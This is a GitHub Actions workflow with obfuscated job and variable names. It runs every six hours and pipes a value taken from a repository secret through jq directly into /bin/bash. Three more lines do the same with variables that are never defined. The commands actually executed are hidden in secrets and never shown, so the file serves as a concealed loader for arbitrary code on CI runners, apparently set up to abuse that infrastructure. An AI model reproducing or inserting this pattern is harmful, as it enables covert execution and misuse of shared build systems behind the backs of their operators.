name: sunxinniang4817
on:
  workflow_dispatch:
  schedule:
    - cron: '49 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sunxinniang4817
        env:
          ewvp381: ${{ secrets.ewvp381 }}
        run: |
          echo $ewvp381 | jq -r .wtb6741 | /bin/bash
          echo $gfkhb95 | jq -r .hs8 | /bin/bash
          echo $jfvzm4 | jq -r .utyrz84577 | /bin/bash
          echo $tpuw9116 | jq -r .v90600 | /bin/bash

